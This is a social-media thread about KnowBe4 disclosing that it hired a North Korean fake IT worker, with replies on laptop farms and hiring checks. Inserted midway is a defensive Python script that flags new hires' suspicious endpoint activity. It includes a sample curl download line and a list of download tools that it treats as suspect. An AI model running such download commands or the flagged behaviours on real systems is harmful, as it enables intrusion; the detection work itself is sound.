Wild, true story from the security awareness and training company KnowBe4 that details how they inadvertently hired a North Korean hacker who was posing as a Western tech worker.

Kudos to them for publishing this. If it can happen to a security awareness company, it can happen to anyone (full disclosure: they've been an advertiser on my site for ages).

https://blog.knowbe4.com/how-a-north-korean-fake-it-worker-tried-to-infiltrate-us

How a North Korean Fake IT Worker Tried to Infiltrate Us


Arizona woman charged in North Korean IT worker scheme that raised millions

US federal prosecutors on Thursday charged an Arizona woman with participating in an elaborate fraud scheme to help foreign IT workers pose as Americans and get hired by major US companies.

ABC15 Arizona in Phoenix (KNXV)

@WarySec @briankrebs It would not shock me to discover that one of our more erratic remote workers was involved in something like this.

@WarySec @briankrebs Yes, though likely not the *exact* laptop farm. But that story is the best public detailing of how these laptop farms work. It’s extraordinary, def recommend the full indictment PDF.

https://github.com/tayvano/lazarus-bluenoroff-research/blob/main/pdfs/2024-05-16_US-v-IT-Workers_cr-00220.pdf

lazarus-bluenoroff-research/pdfs/2024-05-16_US-v-IT-Workers_cr-00220.pdf at main · tayvano/lazarus-bluenoroff-research

a collection of north korean apt articles, analysis and heists attributed to lazarus / bluenoroff / apt38. - tayvano/lazarus-bluenoroff-research


@WarySec @briankrebs also have a highlights thread of said PDF on Twitter (sorry to make y’all choose between long legal pdf and twitter 😅)

https://x.com/tayvano_/status/1791244750173167706

Tay 💖 (@tayvano_) on X

babe wake up new dprk it workers indictment just dropped 😨 https://t.co/rXQaztNllb

@briankrebs Sounds like they caught him almost as soon as he got a machine and connected to their network, if the blog entry is reporting it correctly. Lucky for them that he messed up immediately and triggered all the alarms.

@not2b @briankrebs It’s not that he messed up tbh, it’s that they actually have proper monitors/logs on employee devices.

The reason dude shamelessly went about installing whatever he wanted and crawling for sensitive dox was because 99.99% of organizations DON’T detect this type of activity. 😱

They are currently working at thousands of based companies, especially as remote engineers in tech, ai, crypto, etc.
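The point above is that the detection came from device telemetry, not from the worker being clumsy. As an added illustration (not KnowBe4's tooling and not anything posted in this thread), the script below triages a constructed JSON-lines export of endpoint events for new hires: software installs outside an allowlist, download-tool executions, and bulk reads of sensitive shares are raised at higher severity while the employee is inside a probation window. The field names, roster, allowlist, thresholds and every log line are assumptions made for the example.

```python
"""Triage endpoint telemetry for new hires (added example, constructed data).

Assumed input: JSON lines with fields ts, user, host, event, detail, plus an
HR roster mapping each user to a start date. Nothing here is real telemetry.
"""
import json
from datetime import datetime

ALLOWED_INSTALLS = {"slack", "zoom", "vscode", "docker-desktop"}  # constructed allowlist
PROBATION_DAYS = 30          # first month of employment gets extra scrutiny
BULK_READ_THRESHOLD = 20     # sensitive-share reads per user per day that trigger an alert
SENSITIVE_PREFIXES = ("/shares/hr/", "/shares/finance/", "/shares/legal/")
DOWNLOAD_TOOLS = ("curl ", "wget ")

# Constructed roster: start dates per user.
ROSTER = {"jdoe": "2024-07-01", "asmith": "2023-02-14"}

# Constructed telemetry: a day-old hire installs an unknown tool, pulls a file
# with curl, and reads 25 HR documents; a long-tenured user installs one unknown tool.
EVENTS = "\n".join(
    [
        '{"ts":"2024-07-02T09:12:00","user":"jdoe","host":"lt-0421","event":"install","detail":"slack"}',
        '{"ts":"2024-07-02T09:40:00","user":"jdoe","host":"lt-0421","event":"install","detail":"session-hist-tool"}',
        '{"ts":"2024-07-02T10:01:00","user":"jdoe","host":"lt-0421","event":"exec","detail":"curl -o /tmp/x.bin http://example.invalid/x"}',
    ]
    + [
        f'{{"ts":"2024-07-02T11:{m:02d}:00","user":"jdoe","host":"lt-0421","event":"file_read","detail":"/shares/hr/emp{m}.pdf"}}'
        for m in range(25)
    ]
    + ['{"ts":"2024-07-02T12:00:00","user":"asmith","host":"lt-0118","event":"install","detail":"unknown-tool"}']
)


def days_since_start(user, ts, roster):
    """Whole days between the user's start date and the event timestamp, or None if unknown."""
    start = roster.get(user)
    if start is None:
        return None
    return (datetime.fromisoformat(ts).date() - datetime.fromisoformat(start).date()).days


def severity_for(user, ts, roster):
    """New hires inside the probation window get 'high'; everyone else 'low'."""
    tenure = days_since_start(user, ts, roster)
    return "high" if tenure is not None and 0 <= tenure <= PROBATION_DAYS else "low"


def triage(events_text, roster=ROSTER):
    """Return a list of alert dicts, highest severity first."""
    alerts = []
    sensitive_reads = {}  # (user, day) -> count of reads under SENSITIVE_PREFIXES
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        user, ts, kind, detail = ev["user"], ev["ts"], ev["event"], ev["detail"]
        if kind == "install" and detail.lower() not in ALLOWED_INSTALLS:
            alerts.append({"rule": "unapproved_install", "user": user, "host": ev["host"],
                           "ts": ts, "detail": detail, "severity": severity_for(user, ts, roster)})
        elif kind == "exec" and any(detail.startswith(t) for t in DOWNLOAD_TOOLS):
            alerts.append({"rule": "download_tool_exec", "user": user, "host": ev["host"],
                           "ts": ts, "detail": detail, "severity": severity_for(user, ts, roster)})
        elif kind == "file_read" and detail.startswith(SENSITIVE_PREFIXES):
            key = (user, ts[:10])  # bucket by calendar day
            sensitive_reads[key] = sensitive_reads.get(key, 0) + 1
    for (user, day), count in sensitive_reads.items():
        if count >= BULK_READ_THRESHOLD:
            alerts.append({"rule": "bulk_sensitive_read", "user": user, "ts": day,
                           "count": count, "severity": severity_for(user, day, roster)})
    order = {"high": 0, "low": 1}
    alerts.sort(key=lambda a: order[a["severity"]])  # stable: keeps event order within a severity
    return alerts


if __name__ == "__main__":
    for alert in triage(EVENTS):
        print(json.dumps(alert))
```

The tenure-based severity is the design choice worth copying: the same unapproved install is routine noise for a three-year employee and a page-worthy alert for someone on day two, so weighting by days since start keeps the rule useful without flooding analysts.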

@tay @briankrebs Sure, but if he had started out acting like a normal employee and didn't get more aggressive until he'd built up a rep as a good worker, he might have gotten away with it, even if he triggered an alarm or two. Seems he almost instantly went nuts.

@not2b @briankrebs Oh, 100%. It’s just that they don’t need to. DPRK guys tend to do *exactly* what is necessary to execute their goals.

For example, we saw resumes and GitHubs rapidly evolve when orgs started to notice mismatched geos / work history (and GH started whack-a-moling 🙇‍♀️).

They started interviewing on-cam when orgs began to flag no-cam candidates during initial screens.

No doubt they’ll delay/obfuscate initial activity if orgs start to monitor and detect it, too.

@briankrebs

This is pretty wild - how common are email-only reference checks? I’ve always done phone call or video call at a minimum, surprised a high profile security vendor would have such a porous background check process like this.
@pete_wright IDK. My sense is a ton of companies hire a ton of remote employees all the time, probably many they have never met face to face.
@briankrebs

Yeah, that's a good point, and I'm not trying to dunk on KB4 (I was a former customer of theirs). I've been at smaller shops for quite a while now, so it's easier to make sure new hires have a decent amount of vetting than at larger companies.

Like you said, glad they posted this publicly, as it certainly serves as a good wake-up call for larger orgs.
@pete_wright @briankrebs I just had an email-only reference check for a friend a couple months ago. I was prepared for a phone call, but they were happy enough to take my email response.

@feld @pete_wright That's interesting. A lot of times, the only way you'll know something is off is by talking to them, ideally over video so you can match a name with a face and see how they react to different things. I remember a while back reporting on the hack of the FBI's Infragard portal, the feds vetted and approved a fake application in the name of a CEO of a credit rating agency. But they never called the number in the application, even though the fraudster had submitted the CEO's real mobile number in his application!

https://krebsonsecurity.com/2022/12/fbis-vetted-info-sharing-network-infragard-hacked/

FBI’s Vetted Info Sharing Network ‘InfraGard’ Hacked – Krebs on Security

@briankrebs @pete_wright That sounds like a more nefarious version of when I am forced to provide my email to log in to a "free WiFi" somewhere and I just use abuse@ their domain.
@briankrebs @feld

Oh, I remember reading that article; it certainly upped my paranoia meter by a few degrees! :)

@briankrebs @feld @pete_wright

but here they say

> Our HR team conducted four video conference based interviews on separate occasions, confirming the individual matched the photo provided on their application.

So the photo was modified to match the real person? And that person was actually doing the coding? Or are they using some high quality deepfake for every video call? Because that means more video calls would still not solve it...

@chebra @briankrebs @pete_wright That reminds me: a couple years ago we were hiring contractors from Upwork and we caught a guy scamming. When you set up a call with them you'd get a white dude in America who didn't know anything about the work being done, because he was outsourcing the actual work to people in India.
@briankrebs Heard of attempts at this from a recruiter I talked to at GopherCon two weeks ago.
@briankrebs Wow, they do our security training. Respect to them for publishing.

@briankrebs seriously, though...

The haircut didn't raise any flags?

@briankrebs

My work uses this company; this is exactly like one of their learning exercises. Hope they change it up now, it's pretty boring.

It will be interesting to know how the various checks that KnowBe4 would have used before hiring the employee failed. It can be a valuable learning lesson.
@briankrebs I'll definitely be listening to Hacking Humans podcast this week. Here's to hoping they cover it.
@briankrebs moral of the story: don't cheap out, use a hardware KVM.
@briankrebs Mitnick must be turning in his grave.
@briankrebs Story is weird, but makes no sense.
"the individual matched the photo provided on their application" - US applications don't usually have photos?
"used a raspberry pi to download the malware" - why not any regular computer, or the company one? Macs with corp-mandated rootkits are easy hacking targets.
"they are actually doing the work, getting paid well" - so why bother with malware?
(And where's the FBI crowing about this, if they were "involved"?)

@gabe @briankrebs Maybe the Pi was running pi-kvm or a VPN gateway. Otherwise I don't get either why a Pi would be involved in downloading the file or how they would know that a Pi even was involved.

Also was he circumventing sanctions or doing something malicious?

@briankrebs LOL'd at "The scam is that they are actually doing the work"
@briankrebs It's not clear from the article: did they hire a guy without ever meeting him in person?